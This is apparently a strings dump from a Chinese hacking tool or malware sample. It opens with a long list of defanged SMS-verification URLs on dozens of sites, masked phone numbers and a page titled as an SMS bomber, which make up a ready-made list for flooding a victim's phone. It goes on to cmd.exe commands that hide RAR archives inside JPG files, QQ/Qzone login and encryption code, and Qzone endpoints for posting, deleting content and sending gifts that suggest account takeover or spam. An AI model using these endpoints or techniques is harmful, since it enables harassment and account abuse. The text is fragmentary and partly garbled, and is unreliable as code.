hXXp://zc.qq.com/cgi-bin/bd/send_sms?acc=###########&bkn=1656136920&v=0.6187287989762199
hXXp://weibo.com/signup/v5/formcheck?type=sendsms&value=###########&__rnd=1364610012046hXXp://hm.baidu.com/hm.gif?cc=1&ck=1&cl=16-bit&ds=1280x800&ep=获取验证码*点击&et=4&fl=11.6&ja=1&ln=zh-cn&lo=0&nv=1&rnd=2125197633&si=4cd143d67831005438c65f586314c582&st=3&su=hXXp://club.autohome.com.cn/bbs/thread-c-148-2031217-1.html&v=1.0.40&lv=1&api=8_0&tt=用户注册_汽车之家
hXXps://VVV.qianwang365.com/uc/ajax/obtainSecurityCode4Regist.html?username=###########
hXXp://VVV.efala.net/getcode.flow?phone=###########&cardno=&code=&
hXXp://passport.wanmei.com/NoteAction.do?method=sendRegCode&mobile=###########
hXXp://biz.b2b.cn/member/SendCode.ashx?temptime=1365067755281&m=###########
hXXp://VVV.kunlun.com/index.php?act=ajax.checkUsername&user_name=###########
hXXp://reg.email.163.com/unireg/call.do?cmd=added.mobileverify.sendAcode&mobile=###########&uid=###########@163.com&mark=mobile_start
hXXp://user.syyx.com/ajax/users/checkusername.aspx?u=###########&r=0.42031912299903756
hXXp://VVV.keepc.com/findAccountInfoByAccount.act?mobile=###########
hXXp://gwpassport2.woniu.com/v2/checkusername?jsoncallback=jQuery172013263149083391296_1365068016801&username=###########&_=1365068030671
hXXp://VVV.huggies.com.cn/error.html?aspxerrorpath=/handler/vcode.ashx
hXXp://passport.upaidui.com/mobiles/send_validation_code?mobile_number=###########
hXXps://VVV.cmpassport.com/umc/management/forgetpwd/mobile/reset/?from=2&sso_time=1410981077640
hXXp://user.51wan.com/reg_index_check_0.html?type=username&is=mobile&username=###########
hXXp://interface.game.renren.com/ActivityCenter/?catalog=plugins&gameid=all&aname=reg&method=reg.subUserInfo&mobile=###########&callback=jQuery17204292543791520399_1365068164751&_=1365068180406
hXXp://wap.wifiwldh.com/index.php?register?phone=###########
hXXp://my.xoyo.com/register/NewIsExist/?uid=###########
hXXp://member.tiancity.com/handler/GetPhoneRegAuthCodeHandler.ashx?a=0.016777698590329404&userid=###########
hXXp://VVV.wifiwldh.com/bindMobileCode.act?account=###########&quhao=0086
hXXp://member.changyou.com/register/checkPhoneIsUsed.do?securityPhone=###########
hXXp://VVV.game5.com/member/sendRegisterVerifyCode?reg_mobile=###########
hXXp://passport.kongzhong.com/acc.do?m=sendPhoneVcodeFast&callback=jQuery17200752385214847075_1364445730228&phone=###########&smsvcode=输入手机获取的验证码&_=1364445764320
hXXp://VVV.pceggs.com/myaccount/mobile_ajax.aspx?refresh=0&i_mobileNo=###########
hXXp://VVV.9dapai.com/SMSAuthentication/SMSAuthenticationPage.aspx/btnGenerateCheckCode_Click?(Content)={cellnum:
hXXp://VVV.veryzhun.com/ajax/register.asp?mobile=###########&areacode=86
hXXp://wap.callda.com/register_2.jsp?phoneNumber=###########
hXXp://VVV.200call.com/index.php?action=vphone?uphone=###########
hXXp://wap.12580call.cn/index.php?register&phone=###########
hXXp://member.tiancity.com/handler/GetPhoneRegAuthCodeHandler.ashx?a=0.6334787302703851&userid=###########
hXXp://passport.17u.cn/Member/RegisterHandler.ashx?action=phone&phone=###########&iid=0.6011805873638694
hXXp://VVV.pceggs.com/500.html?aspxerrorpath=/myaccount/mobile_ajax.aspx
hXXp://3g.163.com/t/signup.do?mobile=###########&sub=获取密码短ä¿%
hXXp://m.mail.163.com/reg.s?regtype=mobile&method=registerMobile&mobile_num=###########&password=testtest&password2=testtest&action=提交注册信息=400
hXXp://account.jzyx.com/common/send-sms.html?tel=###########
hXXp://t.sdo.com/home/SendSms?mobile=###########
hXXp://txz.sdo.com/common/msgsend/?m=###########&t=2&method=SendAPPDownLoadSMSCallback&fromid=weblogin&r=0.9407026621045355
hXXps://mcas.sdo.com/authen/checkAccountType.jsonp?callback=checkAccountType_JSONPMethod&inputUserId=###########
hXXp://authleqr.sdo.com/lars/check-account-types.jsonp?callback=jQuery16202903677772887056_1353757072377&userId=###########&_=1353757193062
hXXp://passport.ly.com/member/registerhandler.ashx?action=phone&phone=###########&iid=0.6011805873638694
hXXps://reg.95538.cn/userreg/AjaxHandler.ashx?method=getPhoneCode?mobilePhone=###########&type=0
hXXp://u.baidu.com/?module=default&controller=Reg&action=sendSMS&b1350745948890=1&mobile=###########&appid=3&ucname=huisexinxi
hXXp://g.sdo.com/
hXXp://as.baidu.com/a/msg?act=sendtomobile&f=topic_3001_2_0&mobile=###########&docid=1439803&ctime=1353852949890
hXXp://VVV.sdo.com/404.html
hXXp://as.baidu.com/a/msg?act=sendtomobile&f=web_alad_6@next@software_1003_6&mobile=###########&docid=1346020&ctime=1350747592671
hXXp://api.pengyou.com/json.php?mod=mobilebind&act=sendsms&mobile=###########&g_tk=null
hXXp://VVV.maiduo.com/handler/Register/Register.ashx?act=check&mobile=###########&checkCode=undefined
hXXp://VVV.sinosig.com/auth/regist_resetMsg.action?sso_userName=###########&isAjaxSubmit=true
hXXp://VVV.pubyun.com/accounts/signup_vcode/4449056/?mobile=###########
hXXp://dealer.autohome.com.cn/Handler/SendMessage.ashx?action=sendcode&mob=###########
hXXp://yuyue.shdc.org.cn/User/ajaxSendConfirmCode.aspx?mobile=###########
hXXp://reg.ztgame.com/registe/mobilePhoneRegister?type=isBindPhoneNum&phoneNum=###########
hXXp://VVV.baixing.com/ajax/auth/sendCode/?type=resetPassword&mobile=###########
hXXp://mail.sina.com.cn/cgi-bin/phonecode.php?phonenumber=###########
hXXp://passport.q.com.cn/register/index/ajaxcheckmobile/?mobile=###########
hXXp://yun.baidu.com/account/v1/api/sendacodenormal?dest=###########
hXXps://reg.passport.the9.com/api/chk_loginname?loginname=###########&accounttype=reg_mobile
hXXps://login.sina.com.cn/signup/check_user.php?format=json&from=mobile&name=###########
hXXp://js.ac.10086.cn/jsauth/reg?method=sendVerCode&=###########
hXXp://my.xoyo.com/register/isExist/0.8101254514227967?uid=###########&type=mobile
hXXps://reg.91.com/AjaxAction/AC_register.ashx?action=verifyusernameofmobile&txtUserNameOfMobile=###########
hXXp://passport.wanmei.com/NoteAction.do?method=sendRegCode?mobile=###########
hXXp://authleqr.sdo.com/lars/check-account-types.jsonp?callback=jQuery16203658856788579764_1366925187811&userId=###########&_=1366925195670
hXXp://chinatelecom.zc.qq.com/cgi-bin/send_sms?phonenum=###########&stype=1
hXXp://cas.sdo.com/authen/sendPhoneCheckCode.jsonp?callback=sendPhoneCheckCode_JSONPMethod&inputUserId=###########&type=3&appId=201&areaId=0&serviceUrl=
hXXp://pan.baidu.com/error/404.html
hXXp://sdo.com&productversion=v5&frametype=3&locale=zh_cn&version=21&tag=20&authensource=2&productid=2&_=1366924349498/
hXXp://VVV.1732.com/public/ajax.aspx?app=resendcode&bindaccount=###########
hXXp://sign.kting.cn/register/getphoneverify/phone/###########
hXXp://m.xs8.cn/user/quick_signup.html?mobile=###########
hXXp://bbs.360che.com/ajax1.php?action=ds21&mobilenum=###########&inajax=1&ajaxtarget=ts
hXXp://pass.ledu.com/reg/mobilecode?type=reg&mobile=###########&r=0.7577109599155907
hXXp://VVV.52callme.com/Handler/SendVerifyCodeHandler.ashx?m=###########
hXXp://VVV.sinosig.com/auth/regist_refresh.action?sso_userName=###########&resetSend=1
hXXps://sn.ac.10086.cn/sendMsgRequest?mobileNumber=###########
hXXps://fj.ac.10086.cn/SMSCodeSend?mobileNum=###########&validCode=0000&errorurl=hXXps://fj.ac.10086.cn/4login/errorPage.jsp&name=menhu
hXXps://fj.ac.10086.cn/SMSCodeSend?mobileNum=###########&validCode=0000&errorurl=hXXp://VVV.fj.10086.cn:80/service/login/send.jsp
hXXps://fj.ac.10086.cn/ssouser/sendMessage.do?mobileno=###########
hXXp://VVV.gs.10086.cn/gs_obsh_service/actionDispatcher.do?userMobile=###########
hXXps://sn.ac.10086.cn/sendMsgRequest?code=点击获取验证码&mobileNumber=###########
hXXps://js.ac.10086.cn/jsauth/dzqd/pagSendDypass?umobile=###########
hXXp://gd.10086.cn/ngcrm/hall/SendRandomSms.action?mobile=###########&isReRequest=false
hXXp://liao.189.cn/ECP-Portals/phoneDown/download.do?phone=###########
hXXps://ecplive.cn/reg/servlet/ivrInvokeServlet?number=###########&flagNum=3
hXXp://VVV.clicki.cn/boot/49735
hXXp://hm.baidu.com/h.js?64c023bbf11ff5c065c8edb48530e593
hXXps://fj.ac.10086.cn/4login/errorPage.jsp?code=6667&displayPic=null
hXXp://VVV.fj.10086.cn/service/login/send.jsp?code=6667&displayPic=null
hXXp://ecp.189.cn/?phone=###########
hXXp://VVV.fj.10086.cn/ssoerror
hXXp://hm.baidu.com/hm.gif?cc=1&ck=1&cl=24-bit&ds=1301x731&ep=16265,14490&et=3&fl=15.0&ja=1&ln=zh-CN&lo=0<=1410981070&nv=0&rnd=527396514&si=64c023bbf11ff5c065c8edb48530e593&st=4&su=http://junzhe.phpnet.us/&v=1.0.64&lv=2&u=http://junzhe.phpnet.us/index.php?hm=###########&ok=
hXXp://VVV.52callme.com/error/e404.aspx
hXXp://eiv.baidu.com/hmt/icon/21.gif
hXXp://hm.baidu.com/hm.gif?cc=1&ck=1&cl=24-bit&ds=1301x731&et=0&fl=15.0&ja=1&ln=zh-CN&lo=0<=1410981070&nv=0&rnd=32540188&si=64c023bbf11ff5c065c8edb48530e593&st=4&v=1.0.64&lv=2
hXXp://p.bloxy.cn/antiphish.swf
hXXp://VVV.clicki.cn/refer/track_proxy?rf=dw5frc1z4w&tt=0&data={"site_id":49735,"session_id":"1410981008779994","flow_id":5,"visitor":{"id":"1410981008779994","is_new":0,"is_active":0},"today":"1","review":"0","referer":{"url":""},"page":{"url":"http://junzhe.phpnet.us/index.php?hm=###########&c=1","domain":"junzhe.phpnet.us","title":"短信轰炸网页版 - BETA!","server_time":"1410981079117","loadtime":61866},"client":{"agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E; rv:11.0) like Gecko","screen":{"width":1301,"height":731}},"type":0,"customs":[],"actions":[]}
hXXp://postone.duapp.com/sms/ajax.php?tel=
hXXp://znmbak1.duapp.com/ajax.php?tel=
hXXp://
hXXp://
mrbin\URL.txt
cmd.exe /c %temp%\mrbin\rar.exe a -y %temp%\mrbin\URL.rar %temp%\mrbin\URL.txt
.jpg   %temp%\mrbin\URL.rar %temp%\mrbin\URL
mrbin\URL
mrbin\URL.rar
'Res.rdb'
|Res.rdb
qq.php?login----
hXXps://shenghuo.alipay.com/send/payment/fill.htm?optEmail=
827822285
hXXp://hi.baidu.com/bye_1994/item/2cd7fd48b2acd619fa8960f9
*.gif
|*.gif|JPG
*.jpg
|*.jpg|PNG
*.png
|*.png|BMP
*.bmp
|*.bmp|
;URL:
cmd.exe /c copy /b %temp%\mrbin\URL.jpg   %temp%\mrbin\URL.rar %temp%\mrbin\URL
Created with ajaxload.info
\*.gif
\*.bmp
mrbin\jy.rar
cmd.exe /c %temp%\mrbin\Rar.exe e -y %temp%\mrbin\jy.rar %temp%\mrbin\
BT.torrent
\QQDownload.exe
8349?846:
cmd.exe /c copy /b %temp%\mrbin\BT.jpg   %temp%\mrbin\BT.rar %temp%\mrbin\BT
Mozilla/5.0 (Linux; U; Android 4.2.1; zh-cn; R815T Build/JOP40D) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/4.5 Mobile Safari/533.1
C:\Windows\System32\Drivers\etc\hostshXXp://VVV.super-ec.cnhXXp://wghai.com/echXXp://qsyou.com/echXXp://VVV.wghai.comhXXp://bbs.wghai.com/forum-17-1.html/forum-12-1.html/memcp.php/ip.asp/time.asp/gonggao.txt/ec-user6.php/ec-bd.php/ec-jh.php
hXXp://VVV.super-ec.cn
<input type="text" name="field_2new" size="25" value="" disabled class="txt" />" class="txt" />Function Getcpuid()
Set cpuSet = GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_Processor")
getcpuid=cpu.ProcessorId
VBScript.RegExp
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
{1d5be4b5-fa4a-452d-9cdd-5db35105e7eb}
=@{B96B3CAB-0728-11D3-9D7B-0000F81EF32E}
hXXp://check.ptlogin2.qzone.com/check?uin=
hXXp://captcha.qq.com/getQueSig?aid=549000929&uin=
hXXp://captcha.qq.com/getimgbysig?aid=549000929&uin=
&pt_rsa=0&ptlang=2052&low_login_enable=0&u1=http://m.qzone.com/infocenter&from_ui=1&fp=loginerroralert&device=2&aid=549000929&pt_ttype=1&pt_3rd_aid=pt_3rd_aid_value&ptredirect=1&h=1&g=1&pt_uistyle=9&
hXXp://ptlogin2.qzone.com/login?pt_vcode_v1=0&pt_verifysession_v1=
var str = str.replace(/^\s /, "");
end = str.length;
while (ws.test(str.charAt(--end))) {}
return str.slice(0, end   1)
var hex = str.toString(16);
var len = hex.length;
arr.push("\\x"   hex.substr(j, 2))
var result = arr.join("");
function getEncryption(password, uin, vcode) {
var str1 = hexchar2bin(md5(password));
var str3 = md5(str2   vcode.toUpperCase());
len = str.length; i < len;   i) {
hash  = (hash << 5)   str.charCodeAt(i);
hXXp://m.qzone.com/mood/publish_mood
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13
function encrypt(str,pass){
data = m_xxtea.encrypt(str, pass);
function decrypt(str,pass){
data = m_xxtea.decrypt(str, pass);
if (str.match(/^[\x00-\x7f]*$/) != null) {
return str.toString();
len = str.length;
c = str.charCodeAt(i);
out[j] = str.charAt(i);
out[j] = String.fromCharCode(0xc0 | (c >>> 6),
out[j] = String.fromCharCode(0xe0 | (c >>> 12),
c2 = str.charCodeAt(i);
out[j] = String.fromCharCode(0xf0 | ((c >>> 18) & 0x3f),
return out.join('');
if ((str.match(/^[\x00-\x7f]*$/) != null) ||
(str.match(/^[\x00-\xff]*$/) == null)) {
c = str.charCodeAt(i  );
out[j  ] = str.charAt(i - 1);
c2 = str.charCodeAt(i  );
out[j  ] = String.fromCharCode(((c & 0x1f) << 6) |
c3 = str.charCodeAt(i  );
out[j  ] = String.fromCharCode(((c & 0x0f) << 12) |
c4 = str.charCodeAt(i  );
out[j  ] = String.fromCharCode(((s >>> 10) & 0x03ff) | 0xd800,
var base64EncodeChars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /'.split('');
len = str.length;
c = str.charCodeAt(i  ) << 16 |
str.charCodeAt(i  ) << 8 |
str.charCodeAt(i  );
c = str.charCodeAt(i  );
c = str.charCodeAt(i  ) << 8 |
return out.join('');
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63,
if (/[^ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789\ \/\=]/.test(str)) {
if (str.charAt(len - 2) == '=') {
else if (str.charAt(len - 1) == '=') {
c1 = base64DecodeChars[str.charCodeAt(i  )];
c2 = base64DecodeChars[str.charCodeAt(i  )];
out[j  ] = String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));
c3 = base64DecodeChars[str.charCodeAt(i  )];
out[j  ] = String.fromCharCode(((c2 & 0x0f) << 4) | ((c3 & 0x3c) >> 2));
c4 = base64DecodeChars[str.charCodeAt(i  )];
out[j  ] = String.fromCharCode(((c3 & 0x03) << 6) | c4);
var length = data.length;
data[i] = String.fromCharCode(
return data.join('').substring(0, n);
return data.join('');
var length = string.length;
result[i >> 2] = string.charCodeAt(i) |
string.charCodeAt(i   1) << 8 |
string.charCodeAt(i   2) << 16 |
string.charCodeAt(i   3) << 24;
result[result.length] = length;
this.encrypt = function(string, key) {
var k = stringToLongArray(key, false);
if (k.length < 4) {
k.length = 4;
var n = v.length - 1;
var mx, e, p, q = Math.floor(6   52 / (n   1)), sum = 0;
this.decrypt = function(string, key) {
var mx, e, p, q = Math.floor(6   52 / (n   1)), sum = q * delta & 0xffffffff;
MSScriptControl.ScriptControl
* See hXXp://pajhome.org.uk/crypt/md5 for details.
function hex_sha1(s){return binb2hex(core_sha1(str2binb(s),s.length * chrsz));}
function b64_sha1(s){return binb2b64(core_sha1(str2binb(s),s.length * chrsz));}
function str_sha1(s){return binb2str(core_sha1(str2binb(s),s.length * chrsz));}
function hex_hmac_sha1(key, data){ return binb2hex(core_hmac_sha1(key, data));}
function b64_hmac_sha1(key, data){ return binb2b64(core_hmac_sha1(key, data));}
function str_hmac_sha1(key, data){ return binb2str(core_hmac_sha1(key, data));}
for(var i = 0; i < x.length; i  = 16)
* Calculate the HMAC-SHA1 of a key and some data
function core_hmac_sha1(key, data)
var bkey = str2binb(key);
if(bkey.length > 16) bkey = core_sha1(bkey, key.length * chrsz);
ipad[i] = bkey[i] ^ 0x36363636;
opad[i] = bkey[i] ^ 0x5C5C5C5C;
var hash = core_sha1(ipad.concat(str2binb(data)), 512   data.length * chrsz);
return core_sha1(opad.concat(hash), 512   160);
* Add integers, wrapping at 2^32. This uses 16-bit operations internally
for(var i = 0; i < str.length * chrsz; i  = chrsz)
bin[i>>5] |= (str.charCodeAt(i / chrsz) & mask) << (32 - chrsz - i2);
for(var i = 0; i < bin.length * 32; i  = chrsz)
str  = String.fromCharCode((bin[i>>5] >>> (32 - chrsz - i2)) & mask);
for(var i = 0; i < binarray.length * 4; i  )
str  = hex_tab.charAt((binarray[i>>2] >> ((3 - i%4)*8 4)) & 0xF)  
hex_tab.charAt((binarray[i>>2] >> ((3 - i%4)*8 )) & 0xF);
for(var i = 0; i < binarray.length * 4; i  = 3)
if(i * 8   j * 6 > binarray.length * 32) str  = b64pad;
else str  = tab.charAt((triplet >> 6*(3-j)) & 0x3F);
\empty.exe
`.data
could not empty working set for process #%d [%s]
could not empty working set for process #%d
USAGE: empty.exe {pid | task-name}
AdjustTokenPrivileges failed with %d
LookupPrivilegeValue failed with %d
OpenProcessToken failed with %d
empty.pdb
msvcrt.dll
CloseWindowStation
SetProcessWindowStation
OpenWindowStationA
EnumWindowStationsA
?{B96B3CAF-0728-11D3-9D7B-0000F81EF32E}
javascript:document.onsdragstart=document.onselectstart=document.oncontextmenu=function(){return true}
javascript:document.onselectstart = document.oncontextmenu = document.onmousedown = document.onkeydown = function(){return true;};
var jie = document.createStyleSheet();jie.addRule('html','overflow:hidden;');
text|password|file
WarnOnHTTPSToHTTPRedirect
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
&url_long=
hXXps://api.weibo.com/2/short_url/shorten.json?source=
hXXp://t.cn/
&url_short=
hXXps://api.weibo.com/2/short_url/expand.json?source=
"url_long":"
hXXps://api.weibo.com/2/short_url/comment/counts.json?source=
hXXps://api.weibo.com/2/short_url/comment/comments.json?source=
hXXps://api.weibo.com/2/short_url/share/statuses.json?source=
hXXps://api.weibo.com/2/short_url/share/counts.json?source=
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.92 Safari/537.1 LBBROWSER
hXXp://q
&saveURL=0&new3gqq=true&aid=nqqchatMain
hXXp://q32.3g.qq.com/g/s?sid=
#0#0#0#16
hXXp://ti2.3g.qq.com/g/s?sid=
hXXp://q32.3g.qq.com/g/s?sid=AWU77ci3XzvVDrnKIYW0-atl&aid=nqqchatMain&p=
<p><a href="hXXp://q
<a href="hXXp://(.*?)"."/>(.*?)</a>
hXXp://q60.3g.qq.com/g/s?aid=nqqchatMain&sid=
hXXp://q60.3g.qq.com/g/s?sid=
hXXp://blog30.z.qq.com/mmsgb/add_msg.jsp?sid=
&msg=
&css=hXXp://imgcache.qq.com/ptcss/b2/sjpt/549000912/qzonelogin_ptlogin.css&mibao_css=m_qzone&aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&ptredirect=1&h=1&from_ui=1&dumy=&fp=loginerroralert&action=10-77-43469&g=1&t=1&dummy=&js_type=2&js_ver=10009
hXXp://ptlogin2.qq.com/login?ptlang=2052&u=
hXXp://base.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=
hXXp://captcha.qq.com/getimage?aid=549000912&r=0.
hXXp://b11.qzone.qq.com/cgi-bin/blognew/add_blog?g_tk=
&secverifykey=28Q1206
&html=
qzreferrer=http://ctc.qzs.qq.com/qzone/newblog/v5/editor.html#opener=refererurl&source=1&refererurl=http%3A%2F%2Fctc.qzs.qq.com%2Fqzone%2Fapp%2Fblog%2Fv6%2Fbloglist.html%23nojump%3D1%26page%3D1%26sortType%3D0%26viewmode%3D0%26catalog%3Dlist&cate=¸öÈËÈÕ¼Ç&title=
hXXp://b11.qzone.qq.com/cgi-bin/blognew/mod_blog_effect?g_tk=
qzreferrer=http://ctc.qzs.qq.com/qzone/app/blog/v6/bloglist.html#nojump=1&page=1&sortType=0&viewmode=0&catalog=list&uin=
hXXp://drift.qzone.qq.com/cgi-bin/sendgift?g_tk=
&gifttype=0&gifttitle=冰爽多多&newadmin=1&birthdaytab=0&answerid=&arch=0&clicksrc=&click_src_v2=01010000556055601&verifycode=[object]
&source=0&nick=ㄨ 林媛熙&giftid=
&type=&birthday=&birthdaytab=0&lunarFlag=0&source=0&nick=%E3%84%A8%20%E6%9E%97%E5%AA%9B%E7%86%99&giveback=#html=send_list&fupdate=1&random=0.4746827037606886&charset=utf-8&uin=
qzreferrer=http://ctc.qzs.qq.com/qzone/gift/send_list.html?uin=
hXXp://m.qzone.qq.com/cgi-bin/new/add_msgb?g_tk=
qzreferrer=http://ctc.qzs.qq.com/qzone/msgboard/msgbcanvas.html#page=1&content=
hXXp://m.qzone.qq.com/cgi-bin/new/del_msgb?g_tk=
qzreferrer=http://ctc.qzs.qq.com/qzone/msgboard/msgbcanvas.html#page=3&hostUin=
&pfid=2&qz_ver=6&appcanvas=0&qz_style=v6/88¶ms=&entertime=1368691025618&canvastype=
&t1_source=1&code_version=1&format=fs&out_charset=UTF-8&qzreferrer=http://ctc.qzs.qq.com/qzone/app/mood_v6/html/index.html?mood#uin=
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_delete_v6?g_tk=
hXXp://b11.qzone.qq.com/cgi-bin/blognew/del_blog?g_tk=
qzreferrer=http://ctc.qzs.qq.com/qzone/app/blog/v6/bloglist.html#nojump=1&page=1&catalog=list&uin=
hXXp://u.photo.qq.com/cgi-bin/upp/qun_del_album_v2?g_tk=
/photo&qunId=
qzreferrer=http://qun.qzone.qq.com/group#!/
hXXp://qun.qzone.qq.com/cgi-bin/group_share_delete?g_tk=
&filepath=/102/
&filepatch=/102/
/share&uin=
hXXp://qzone-music.qq.com/fcg-bin/favnetsongtobgm.fcg?g_tk=
formsender=1&source=102&url=
hXXp://b.qzone.qq.com/cgi-bin/blognew/blog_get_countlist?type=1&uin=
hXXp://m.qzone.qq.com/cgi-bin/new/get_msgb?uin=0&hostUin=
hXXp://b.qzone.qq.com/cgi-bin/blognew/blog_output_data?uin=
hXXp://g.qzone.qq.com/cgi-bin/friendshow/cgi_get_visitor_simple?uin=
hXXp://follow.v.t.qq.com/index.php?c=follow&a=quick&name=
&loginUin=0&s=
hXXp://g.qzone.qq.com/fcg-bin/cgi_emotion_list.fcg?uin=
hXXp://s.browser.qq.com/get_uin_face.q?uin=
hXXp://qlogo4.store.qq.com/qzone/
hXXp://w.qzone.qq.com/cgi-bin/likes/internal_dolike_app?g_tk=
&zb_url=
&curkey=http://user.qzone.qq.com/
&unikey=http://user.qzone.qq.com/
/&appid=7030&face=0&fupdate=1&from=1&query_count=200&opuin=
qzreferrer=http://user.qzone.qq.com/
hXXp://w.qzone.qq.com/cgi-bin/tfriend/specialcare_set.cgi?g_tk=
/&uin=
?{B96B3CB5-0728-11D3-9D7B-0000F81EF32E}
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
Scripting.Encoder
1, 2, 0, 1, 2, 0, 2, 0, 0, 2, 0, 2, 1, 0, 2, 0,
1, 0, 2, 0, 1, 1, 2, 0, 0, 2, 1, 0, 2, 0, 0, 2,
1, 1, 0, 2, 0, 2, 0, 1, 0, 1, 1, 2, 0, 1, 0, 2,
1, 0, 2, 0, 1, 1, 2, 0, 0, 1, 1, 2, 0, 1, 0, 2
digits["A".charCodeAt(0) i] = i
digits["a".charCodeAt(0) i] = i 26
for (var i=0; i<10; i  ) digits["0".charCodeAt(0) i] = i 52
if (char.charCodeAt(0) > 126) return char
if (escapes.indexOf(char) != -1) return escaped.substr(escapes.indexOf(char), 1)
val  = (digits[string.substr(0,1).charCodeAt(0)] << 2)
val  = (digits[string.substr(1,1).charCodeAt(0)] >> 4)
val  = (digits[string.substr(1,1).charCodeAt(0)] & 0xf) << 12
val  = ((digits[string.substr(2,1).charCodeAt(0)] >> 2) << 8)
val  = ((digits[string.substr(2,1).charCodeAt(0)] & 0x3) << 22)
val  = (digits[string.substr(3,1).charCodeAt(0)] << 16)
scriptIndex = encodingString.indexOf(marker, stringIndex)
unEncodingString  = encodingString.substring(stringIndex, scriptIndex)
scriptIndex  = marker.length
unEncodingString  = encodingString.substr(stringIndex, encodingString.length)
encodingLength = encodingString.substr(scriptIndex, 6)
scriptIndex  = (6   "==".length)
stringIndex = scriptIndex   "DQgAAA==^#~@".length
char = encodingString.substr(scriptIndex, 1)
if (char.charCodeAt(0) < 0xFF)
unEncodingString  = String.fromCharCode(transformed[pick_encoding[unEncodingIndexd]][char.charCodeAt(0)])
unEncodingString  = unescape(encodingString.substr(  scriptIndex, 1))
re = new RegExp("(JScript|VBscript).encode", "gmi")
while(arr = re.exec(unEncodingString)) unEncodingString = RegExp.leftContext   RegExp.$1   RegExp.rightContext
strdec(AdodbStream.ReadText);
0.0.0.0
0000000000
Math.round(new Date().getTime()/1000)
Math.round(new Date().getTime())
Math.round(new Date().getTime() * 100)
7 9 10 5 8 4 2 1 6 3 7 9 10 5 8 4 2
WScript.Shell
rundll32.exe url.dll,FileProtocolHandler
function trim_output() {while (output.length && (output[output.length - 1] === " " || output[output.length - 1] === indent_string)) {output.pop();}}
function print_newline(ignore_repeated) {ignore_repeated = typeof ignore_repeated === "undefined" ? true : ignore_repeated;trim_output();if (!output.length) {return;}if (output[output.length - 1] !== "\n" || !ignore_repeated) {output.push("\n");}for (var i = 0; i < indent_level; i  ) {output.push(indent_string);}}
function print_space() {var last_output = output.length ? output[output.length - 1] : " ";if (last_output !== " " && last_output !== "\n" && last_output !== indent_string) {output.push(" ");}}
function print_token() {output.push(token_text);}
function remove_indent() {if (output.length && output[output.length - 1] === indent_string) {output.pop();}}
function set_mode(mode) {modes.push(current_mode);current_mode = mode;}
function restore_mode() {do_block_just_closed = current_mode === "DO_BLOCK";current_mode = modes.pop();}
function in_array(what, arr) {for (var i = 0; i < arr.length; i  ) {if (arr[i] === what) {return true;}}return false;}
function get_next_token() {var n_newlines = 0;var c = "";do {if (parser_pos >= input.length) {return ["", "TK_EOF"];}c = input.charAt(parser_pos);parser_pos  = 1;if (c === "\n") {n_newlines  = 1;}} while (in_array(c, whitespace));if (n_newlines > 1) {for (var i = 0; i < 2; i  ) {print_newline(i === 0);}}var wanted_newline = n_newlines === 1;if (in_array(c, wordchar)) {if (parser_pos < input.length) {while (in_array(input.charAt(parser_pos), wordchar)) {c  = input.charAt(parser_pos);parser_pos  = 1;if (parser_pos === input.length) {break;}}}if (parser_pos !== input.length && c.match(/^[0-9] [Ee]$/) && input.charAt(parser_pos) === "-") {parser_pos  = 1;var t = get_next_token(parser_pos);c  = "-"   t[0];return [c, "TK_WORD"];}if (c === "in") {return [c, "TK_OPERATOR"];}return [c, "TK_WORD"];}if (c === "(" || c === "[") {return [c, "TK_START_EXPR"];}if (c === ")" || c === "]") {return [c, "TK_END_EXPR"];}if (c === "{") {return [c, "TK_START_BLOCK"];}if (c === "}") {return [c, "TK_END_BLOCK"];}if (c === ";") {return [c, "TK_END_COMMAND"];}if (c === "/") {var comment = "";if (input.charAt(parser_pos) === "*") {parser_pos  = 1;if (parser_pos < input.length) {while (!(input.charAt(parser_pos) === "*" && input.charAt(parser_pos   1) && input.charAt(parser_pos   1) === "/") && parser_pos < input.length) {comment  = input.charAt(parser_pos);parser_pos  = 1;if (parser_pos >= input.length) {break;}}}parser_pos  = 2;return ["/*"   comment   "*/", "TK_BLOCK_COMMENT"];}if (input.charAt(parser_pos) === "/") {comment = c;while (input.charAt(parser_pos) !== "\r" && input.charAt(parser_pos) !== "\n") {comment  = input.charAt(parser_pos);parser_pos  = 1;if (parser_pos >= input.length) {break;}}parser_pos  = 1;if (wanted_newline) {print_newline();}return [comment, "TK_COMMENT"];}}if (c === "'" || c === "\"" || c === "/" && (last_type === "TK_WORD" && last_text === "return" || last_type === "TK_START_EXPR" || last_type === "TK_END_BLOCK" || last_type === "TK_OPERATOR" || last_type === "TK_EOF" || last_type === "TK_END_COMMAND")) {var sep = c;var esc = false;c = "";if (parser_pos < input.length) {while (esc || input.charAt(parser_pos) !== sep) {c  = input.charAt(parser_pos);if (!esc) {esc = input.charAt(parser_pos) === "\\";} else {esc = false;}parser_pos  = 1;if (parser_pos >= input.length) {break;}}}parser_pos  = 1;if (last_type === "TK_END_COMMAND") {print_newline();}return [sep   c   sep, "TK_STRING"];}if (in_array(c, punct)) {while (parser_pos < input.length && in_array(c   input.charAt(parser_pos), punct)) {c  = input.charAt(parser_pos);parser_pos  = 1;if 